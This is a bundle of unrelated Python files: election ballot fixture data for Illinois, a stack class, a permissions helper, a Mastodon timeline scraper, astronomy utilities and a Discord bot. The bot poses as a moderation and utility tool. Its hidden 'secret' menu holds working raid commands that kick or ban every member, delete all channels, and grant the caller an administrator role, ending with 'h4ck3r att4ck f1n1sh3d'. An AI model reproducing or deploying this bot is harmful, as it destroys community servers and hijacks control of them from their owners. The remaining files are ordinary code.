'type': 'Facebook',
'id': 'https://www.facebook.com/SheilaSimonIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/SheilaSimonIL'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SheilaSimonIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Secretary Of State',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Christopher Michel',
'party': 'Libertarian',
'candidateUrl': 'http://chrisforillinois.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ChrisMichelforIllinois'
}]
}, {
'name': 'Jesse White',
'party': 'Democratic'
}, {
'name': 'Michael Webster',
'party': 'Republican',
'candidateUrl': 'http://websterforillinois.net/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/MikeWebsterIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/MikeWebsterIL'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106530502764515758186'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/MikeWebsterIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Attorney General',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Ben Koyl',
'party': 'Libertarian',
'candidateUrl': 'http://koyl4ilattorneygeneral.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Koyl4AttorneyGeneral'
}]
}, {
'name': 'Lisa Madigan',
'party': 'Democratic',
'candidateUrl': 'http://lisamadigan.org/splash',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/lisamadigan'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/LisaMadigan'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106732728212286274178'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/LisaMadigan'
}]
}, {
'name': 'Paul M. Schimpf',
'party': 'Republican',
'candidateUrl': 'http://www.schimpf4illinois.com/contact_us?splash=1',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/136912986515438'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Schimpf_4_IL_AG'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Treasurer',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Matthew Skopek',
'party': 'Libertarian',
'candidateUrl': 'http://www.matthewskopek.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/TransparentandResponsibleGoverment'
}]
}, {
'name': 'Michael W. Frerichs',
'party': 'Democratic',
'candidateUrl': 'http://frerichsforillinois.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/mikeforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/mikeforillinois'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/116963380840614292664'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCX77L5usHWxrr0BdOv0r8Dg'
}]
}, {
'name': 'Tom Cross',
'party': 'Republican',
'candidateUrl': 'http://jointomcross.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/JoinTomCross'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JoinTomCross'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117776663930603924689'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCDBLEvIGHJX1kIc_eZL5qPw'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'State House - District 4',
'level': ['administrativeArea1'],
'roles': ['legislatorLowerBody'],
'district': {
'name': 'Illinois State House district 4',
'scope': 'stateLower',
'id': 'ocd-division/country:us/state:il/sldl:4'
},
'candidates': [{
'name': 'Cynthia Soto',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Treasurer',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maria Pappas',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Clerk',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'David D. Orr',
'party': 'Democratic',
'candidateUrl': 'http://www.davidorr.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ClerkOrr'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/cookcountyclerk'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/TheDavidOrr'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Sheriff',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Dart',
'party': 'Democratic',
'candidateUrl': 'http://www.sherifftomdart.com/',
'channels': [{
'type': 'Twitter',
'id': 'https://twitter.com/TomDart'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Assessor',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Joseph Berrios',
'party': 'Democratic',
'candidateUrl': 'http://www.electjoeberrios.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Board President',
'level': ['administrativeArea2'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Toni Preckwinkle',
'party': 'Democratic',
'candidateUrl': 'http://www.tonipreckwinkle.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/196166530417661'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ToniPreckwinkle'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Arnold Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Bridget Anne Mitchell',
'party': 'Democratic',
'candidateUrl': 'http://mitchellforjudge.com',
'email': '[email protected]'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Reyes Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Diana Rosario',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Howse, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Caroline Kate Moreland',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/judgemoreland'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Neville, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'William B. Raines',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Egan Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Daniel J. Kubasiak',
'party': 'Democratic',
'candidateUrl': 'http://www.judgedank.org/',
'email': '[email protected]'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Connors Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Kristal Rivers',
'party': 'Democratic',
'candidateUrl': 'http://rivers4judge.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/193818317451678'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Rivers4Judge'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - McDonald Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Cynthia Y. Cobbs',
'party': 'Democratic',
'candidateUrl': 'http://judgecobbs.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/1387935061420024'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/judgecobbs'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Lowrance Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Carroll',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Veal Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Andrea Michele Buford',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ElectJudgeBufordForTheBench'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Burke Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maritza Martinez',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Felton Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': "Patricia O'Brien Sheahan",
'party': 'Democratic',
'candidateUrl': 'http://sheahanforjudge.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (1)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15966',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (2)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15967',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (1)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15738',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (2)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15739',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (3)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15740',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}],
'state': [{
'name': 'Illinois',
'electionAdministrationBody': {
'name': 'Illinois State Board of Elections',
'electionInfoUrl': 'http://www.elections.il.gov',
'votingLocationFinderUrl': 'https://ova.elections.il.gov/PollingPlaceLookup.aspx',
'ballotInfoUrl': 'https://www.elections.il.gov/ElectionInformation/OfficesUpForElection.aspx?ID=2GLMQa4Rilk%3d',
'correspondenceAddress': {
'line1': '2329 S Macarthur Blvd.',
'city': 'Springfield',
'state': 'Illinois',
'zip': '62704-4503'
}
},
'local_jurisdiction': {
'name': 'CITY OF CHICAGO',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
},
'sources': [{
'name': '',
'official': False
}]
}]
}
polling_data = [{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''},
{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''
}]
| python |
def readFile(path):
try:
with open(path, "r") as file:
return file.read()
    except OSError:
print(
"{Error: Failed to load file. File doesn't exist or invalid file path, "
+ "Message: Please check arguments or import strings.}"
)
return ""
class Stack:
def __init__(self):
self._stack = []
def isEmpty(self):
return len(self._stack) == 0
def peek(self):
return self._stack[-1] if not self.isEmpty() else None
def push(self, element):
self._stack.append(element)
def pop(self):
return self._stack.pop() if not self.isEmpty() else None
def get(self, index):
return self._stack[index] if index < len(self._stack) and index >= 0 else None
def __len__(self):
return len(self._stack)
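# Usage sketch:
# s = Stack()
# s.push(1); s.push(2)
# assert s.peek() == 2 and s.pop() == 2 and len(s) == 1 and not s.isEmpty()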
| python |
import discord
from discord.ext import commands
from discord.ext.commands import Bot
import asyncio
import time
import logging
import random
import googletrans
prefix = "$"
BOT_TOKEN = "token-goes-here"
LOG_CHANNEL_ID = 0  # hypothetical placeholder: set to your log channel's ID
intents = discord.Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, intents=intents)
client.remove_command("help")
@client.event
async def on_ready():
print ("Bot is now online!")
@client.event
async def on_guild_join(guild):
    print("Joining the server: {0}".format(guild.name))
@client.command(pass_context=True)
async def clear(ctx, amount=1000):
await ctx.channel.purge(limit=amount)
@client.command(pass_context=True)
async def ping(ctx):
channel = ctx.message.channel
t1 = time.perf_counter()
await channel.trigger_typing()
t2 = time.perf_counter()
embed=discord.Embed(title=None, description='Ping: {}'.format(round((t2-t1)*1000)), color=0x2874A6)
await channel.send(embed=embed)
@client.command(pass_context=True)
async def avatar(ctx, member : discord.Member = None):
    if member is None:
member = ctx.author
memavatar = member.avatar_url
avEmbed = discord.Embed(title = f"{member.name}'s Avatar")
avEmbed.set_image(url = memavatar)
await ctx.send(embed = avEmbed)
@client.command()
async def say(ctx, *, msg=None):
if msg is not None:
await ctx.send(msg)
await ctx.message.delete()
@client.command(aliases=['tr'])
async def translate(ctx, lang_to, *args):
lang_to = lang_to.lower()
if lang_to not in googletrans.LANGUAGES and lang_to not in googletrans.LANGCODES:
raise commands.BadArgument("Invalid language to translate text to")
text = ' '.join(args)
translator = googletrans.Translator()
text_translated = translator.translate(text, dest=lang_to).text
await ctx.send(text_translated)
@client.command(pass_context=True)
async def userinfo(ctx, member: discord.Member=None):
channel = ctx.message.channel
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("**The user's name is: {}**".format(member.name) + "\n**The user's ID is: {}**".format(member.id) + "\n**The user's highest role is: {}**".format(member.top_role) + "\n**The user joined at: {}**".format(member.joined_at) + "\n**The user's account creation date is: {}**".format(member.created_at))
@client.command(pass_context=True)
async def kick(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send("Please input a valid user.")
else:
await channel.send("Die, **{}**".format(member.name))
await member.kick()
else:
await channel.send("I bet you don't have enough permissions.")
@client.command(pass_context=True)
async def ban(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("Die **{}**.".format(member.name))
await member.ban()
else:
await channel.send("Where are your permissions?!")
@client.command(pass_context=True)
async def mute(ctx, member: discord.Member):
guild = ctx.guild
mutedRole = discord.utils.get(guild.roles, name="Muted")
if not mutedRole:
mutedRole = await guild.create_role(name="Muted")
for channel in guild.channels:
await channel.set_permissions(mutedRole, speak=False, send_messages=False, read_message_history=True, read_messages=False)
await member.add_roles(mutedRole)
await ctx.send(f"Muted {member.mention}.")
await member.send(f"Silence, {guild.name}.")
@client.command(pass_context=True)
async def unmute(ctx, member: discord.Member):
mutedRole = discord.utils.get(ctx.guild.roles, name="Muted")
await member.remove_roles(mutedRole)
await ctx.send(f"Unmuted {member.mention}.")
await member.send(f"Make sure you wont say bullshit again, {ctx.guild.name}")
@client.command(pass_context=True)
async def secret(ctx):
member = ctx.message.author
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.set_author(name='Bot Commands')
    embed.add_field(name='$ba', value='Bans everybody from the server (bot needs banning perms and needs to have a higher role than users)', inline=False)
embed.add_field(name='$dc', value='Deletes all channels (bot needs manage channels perms)', inline=False)
embed.add_field(name='$ka', value='Kicks everyone from the server (bot needs kicking perms)', inline=False)
embed.add_field(name='$a', value='Gives you admin role (bot needs administrator)', inline=False)
embed.add_field(name='$invite', value='Sends an invite link of the bot', inline=False)
embed.add_field(name='$createchannel', value='makes x amount of channels defined by you', inline=False)
embed.add_field(name='$createrole', value='makes x amount of roles defined by you', inline=False)
embed.add_field(name='$ping', value='Gives ping to client (expressed in ms)', inline=False)
embed.add_field(name='$kick', value='Kicks specified user', inline=False)
embed.add_field(name='$ban', value='Bans specified user', inline=False)
embed.add_field(name='$userinfo', value='Gives information of a user', inline=False)
embed.add_field(name='$clear', value='Clears an X amount of messages', inline=False)
embed.add_field(name='$dm', value='Sends a direct message containing hi to the author', inline=False)
embed.add_field(name='$serverinfo', value='Gives information about the server', inline=False)
embed.add_field(name='$avatar', value="Shows avatar of selected user")
embed.add_field(name='$tr', value="Translates text. Example: $tr english hola")
    embed.add_field(name='$mute', value="Mutes a user.")
    embed.add_field(name='$unmute', value="Unmutes a user.")
embed.add_field(name='$say', value="Say a specific message.")
await member.send(embed=embed)
@client.command()
async def serverinfo(ctx):
name = str(ctx.guild.name)
description = str(ctx.guild.description)
owner = str(ctx.guild.owner)
id = str(ctx.guild.id)
region = str(ctx.guild.region)
memberCount = str(ctx.guild.member_count)
icon = str(ctx.guild.icon_url)
date = str(ctx.guild.created_at)
embed = discord.Embed(
title=name + " Server Information",
description=description,
color=discord.Color.blue()
)
embed.set_thumbnail(url=icon)
embed.add_field(name="Owner", value=owner, inline=True)
embed.add_field(name="Server ID", value=id, inline=True)
embed.add_field(name="Region", value=region, inline=True)
embed.add_field(name="Member Count", value=memberCount, inline=True)
embed.add_field(name="Created On", value=date, inline=True)
await ctx.send(embed=embed)
@client.command(pass_context=True)
async def ka(ctx):
guild = ctx.message.guild
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for member in list(ctx.message.guild.members):
try:
await guild.kick(member)
print ("User " + member.name + " has been kicked")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User kicked", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Kicked everyone.")
@client.command(pass_context=True)
async def ba(ctx):
guild = ctx.message.guild
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Banned everyone.")
@client.command(pass_context=True)
async def dc(ctx):
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for channel in list(ctx.message.guild.channels):
try:
await channel.delete()
print (channel.name + " has been deleted")
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.add_field(name="Channel deleted", value=f'#{channel.name}')
await logchannel.send(embed=embed)
except:
pass
guild = ctx.message.guild
channel = await guild.create_text_channel("hello")
await channel.send("g3t 13373d")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print("h4ck3r att4ck f1n1sh3d")
@client.command(pass_context=True)
async def a(ctx):
guild = ctx.message.guild
perms = discord.Permissions(8)
    logchannel = client.get_channel(LOG_CHANNEL_ID)
await guild.create_role(name='*', permissions=perms)
member = ctx.message.author
role = discord.utils.get(guild.roles, name="*")
await member.add_roles(role)
embed = discord.Embed(
colour = discord.Colour.orange()
)
embed.add_field(name="User got admin", value=f'{member}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createchannel(ctx, x):
guild = ctx.message.guild
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for i in range(int(x)):
await guild.create_text_channel("newchannel")
embed = discord.Embed(
colour = discord.Colour.green()
)
embed.add_field(name="Channels created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createrole(ctx, x):
guild = ctx.message.guild
perms = discord.Permissions(0)
logchannel = client.get_channel(739058160291020920)
for i in range(int(x)):
await guild.create_role(name="somerole", permissions=perms)
embed = discord.Embed(
colour = discord.Colour.gold()
)
embed.add_field(name="Roles created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def dm(ctx):
await ctx.author.send("hi")
client.run(BOT_TOKEN)
| python |
"""Helper file to check if user has valid permissions."""
from application.common.common_exception import (UnauthorizedException,
ResourceNotAvailableException)
from application.model.models import User, UserProjectRole, RolePermission, \
Permission, UserOrgRole, Organization, Project, Role
from index import db
def check_permission(user_object, list_of_permissions=None,
org_id=None, project_id=None):
"""
    Method to check whether the user is authorized.
Args:
list_of_permissions (list): list of permission names to be checked
user_object (object): User object with caller information
org_id (int): Id of the org
project_id (int): Id of the project
Returns: True if authorized, False if unauthorized
"""
# check if user is super admin
super_user = User.query.filter_by(user_id=user_object.user_id).first()
if super_user.is_super_admin:
return True
# check for project permission
if project_id:
project_permission = db.session.query(
Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserProjectRole,
RolePermission.role_id == UserProjectRole.role_id).filter(
UserProjectRole.project_id == project_id,
UserProjectRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and project_permission:
return True
if project_permission:
project_permission_from_db = \
[each_permission[0] for each_permission in project_permission]
if set(list_of_permissions).issubset(project_permission_from_db):
return True
# Check for Organization permission
if org_id:
org_permission = db.session.query(Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserOrgRole, RolePermission.role_id == UserOrgRole.role_id).filter(
UserOrgRole.org_id == org_id,
UserOrgRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and org_permission:
return True
if org_permission:
org_permission_from_db = \
[each_permission[0] for each_permission in org_permission]
if set(list_of_permissions).issubset(org_permission_from_db):
return True
raise UnauthorizedException
def check_valid_id_passed_by_user(org_id=None, project_id=None, user_id=None,
role_id=None,
**kwargs):
"""Check if Ids passed are valid in DB."""
valid_org, valid_project, valid_user, valid_role = None, None, None, None
if org_id:
valid_org = Organization.query.filter_by(
org_id=org_id, is_deleted=False).first()
if not valid_org:
raise ResourceNotAvailableException("Organization")
if project_id:
valid_project = Project.query.filter_by(
project_id=project_id, is_deleted=False).first()
if not valid_project:
raise ResourceNotAvailableException("Project")
if user_id:
valid_user = User.query.filter_by(
user_id=user_id, is_deleted=False).first()
if not valid_user:
raise ResourceNotAvailableException("User")
if role_id:
valid_role = Role.query.filter_by(
role_id=role_id).first()
if not valid_role:
raise ResourceNotAvailableException("Role")
return valid_org, valid_project, valid_user, valid_role
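# Usage sketch (hypothetical permission name and project id, for illustration):
# check_permission(current_user, ["VIEW_PROJECT"], project_id=42)
# raises UnauthorizedException unless the caller holds the permission.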
| python |
#!/bin/python3
# this script should be run with a "script" command to save the output into a file
import requests
import io
import json
# put the instance needed here
inst='https://octodon.social/api/v1/timelines/public?local=1'
with io.open("toots.txt","a",encoding="utf8") as f:
while True:
res = requests.get(inst)
toots = res.text
f.write(toots+'\n')
headers = res.headers
links = headers['Link']
suiv=links.split()[0].replace('<',' ').replace('>',' ').replace(';',' ').strip()
print(suiv)
if not suiv.startswith("https") or suiv==inst: break
inst=suiv
# reload
# with io.open("toots.txt","r",encoding="utf-8") as f:
# for l in f:
# res=json.loads(l)
# for t in res: print(t['content'])
# this script only downloads the posts in the public local timeline, so there are no dialogs in there yet!
# look at downloadReplies.py next to get the dialogs
| python |
# Licensed under MIT license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""Utility functions."""
import numpy as np
__all__ = ['mag_to_flux', 'flux_to_mag', 'e1_e2_to_shape']
def mag_to_flux(mag, zeropoint=27.0):
"""Convert magnitude into flux unit.
"""
return 10.0 ** ((zeropoint - mag) / 2.5)
def flux_to_mag(flux, zeropoint=27.0):
"""Convert flux into magnitude unit.
"""
# TODO: deal with negative values more gracefully
return -2.5 * np.log10(flux) + zeropoint
def e1_e2_to_shape(e1, e2, shape_type='b_a'):
"""Convert the complex ellipticities to normal shape.
"""
    # Position angle
pa = np.arctan(e2 / e1) * 0.5
# Axis ratio or ellipticity or eccentricity
abs_e = np.sqrt(e1 ** 2 + e2 ** 2)
b_a = (1 - abs_e) / (1 + abs_e)
if shape_type == 'b_a':
# Axis ratio
return b_a, pa
elif shape_type == 'ellip':
# Ellipticity
return 1.0 - b_a, pa
elif shape_type == 'eccen':
# Eccentricity
return np.sqrt(1 - b_a ** 2), pa
else:
raise ValueError("# Wrong shape type: [b_a|ellip|eccen]")
def shape_to_e1_e2(b_a, pa):
"""Convert axis ratio and position angle into complex ellipticities.
"""
abs_e = (1 - b_a) / (1 + b_a)
return abs_e * np.cos(2 * pa), abs_e * np.sin(2 * pa)
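# Worked example (sketch): e1 = 0.2, e2 = 0 gives |e| = 0.2, so
# b_a = (1 - 0.2) / (1 + 0.2) ~= 0.667 and pa = 0:
# b_a, pa = e1_e2_to_shape(0.2, 0.0)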
| python |
#!/usr/bin/env python3
import os
import sys
import json
import random
from pathlib import Path
from PySide6 import QtCore, QtWidgets
from pikepdf import Pdf, Encryption
